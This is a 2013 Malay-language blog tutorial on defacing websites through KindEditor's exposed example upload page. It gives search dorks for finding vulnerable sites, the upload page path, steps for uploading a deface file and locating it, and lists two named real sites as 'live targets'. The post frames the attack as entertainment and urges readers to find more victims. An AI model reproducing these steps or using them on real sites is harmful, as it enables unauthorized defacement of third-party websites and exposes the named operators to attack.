» »Unlabelled » CARA DEFACE DENGAN KINDEDITOR
Monday, 23 December 2013

Assalamualaikum semua...entry hari ini aku nak ajar korang cara deface dengan KindEditor...tanpa berlengah lagi jom mula .




1. Mula-mula cari website vuln guna dork dibawah :


  • intitle:index of? inurl:kindeditor
  • inurl:examples/uploadbutton.html
#note :korang boleh guna dork sendiri untuk mendapatkan web yg vuln.use your brain.. ;)

selepas itu pilih salah satu website.

2. Setelah buka website tersebut, masukkan exploit dibawah :

http://www.sitevuln.com/kindeditor/examples/uploadbutton.html


Atau bukak directory one by one(lebih berkesan)

3. Selepas itu korang akan nampak butang upload.
click, pilih file deface anda, dan dia akan upload automatik.

Supported Files:doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2, gif, jpg, dll

4. Untuk tengok hasil deface, akan terpapar link file yg telah di-upload sebentar tadi di dalam kotak sebelah upload itu.Cuma perlu copy, dan replace link itu di depan url website.
CONTOH :

Dalam Kotak keluar :
/themes/default/js/kindeditor/attached/file/20111222/20111222172332_24051.html

Replace Link ni di depan URL :
http://www.arimlab.com/themes/default/js/kindeditor/attached/file/20111222/20111222172332_24051.html

5. DONE!!!

Some Live Targets :

  • http://www.arimlab.com/themes/default/js/kindeditor/examples/uploadbutton.html
  • http://www.clogoo.net/public/js/kindeditor/examples/uploadbutton.html
Baiklah itu saja untuk entry kali ini...semoga terhibur dan berjaya....

INGAT!Jangan malas untuk meng-explore dan mereka dork sendiri...selamat berjaya...

Assalamualaikum.
Posted by at 05:48

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)